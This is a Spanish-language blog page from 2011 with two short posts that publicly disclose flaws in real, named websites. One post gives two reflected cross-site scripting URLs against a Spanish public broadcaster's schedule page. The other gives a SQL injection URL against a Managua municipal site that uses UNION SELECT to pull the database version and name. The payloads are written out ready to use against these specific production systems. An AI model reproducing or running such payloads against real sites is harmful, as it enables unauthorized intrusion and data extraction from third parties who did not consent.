martes, 27 de septiembre de 2011

[XSS] en RTVE Television Española

7:18 Anónimo No comments

Hola amigos de regreso por estos rumbos con un pequeño hallazgo que encontre culpa de mi curiosidad.
esun problema de XSS en donde podemos incrustrar codigo HTML en el sitio en mención, a continuación el ejemplo:

1- http://www.rtve.es/television/tve-internacional/parrilla/?idpais=%3Cimg%20src=http://psx-scene.com/forums/images/news/no_hack.jpg%20/%3E


2- http://www.rtve.es/television/tve-internacional/parrilla/?idpais=%3Cinput%20type=%22text%22%20size=%2215%22%20maxlength=%2230%22%20value=Nombre%20name=nombre%3E


Error inofensivo?, eso depende de la imaginación que pueda tener el atacante y de sus intensiones tambien.



Hasta la PRoXYma.



Read more »

jueves, 1 de septiembre de 2011

[hack] iSQL en sitio web de Alcaldía de Managua

10:23 Anónimo No comments

Vulnerabilidad de inyección de SQL

Archivo Vulnerable                   Campo vulnerable
index.php                                    cri 
 
Detalles:  Con solo inyectar ' en la url mencionada y no muestra 
información sin mostrar error, pero al probar la inyección se 
obtienen los datos. 
 
Ejemplo: 

http://www.managua.gob.ni/index.php?s=3005&cri=3%20UNION%20SELECT%201,version%28%29,3,4,database%28%29--

Sin más detalles para evitar el abuso de Script kiddies.
Read more »

Twitter Delicious Facebook Digg Stumbleupon Favorites More
RSS Feed Subscribe to Our RSS feed!
Sígueme en Twitter! Sígueme en Twitter!

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host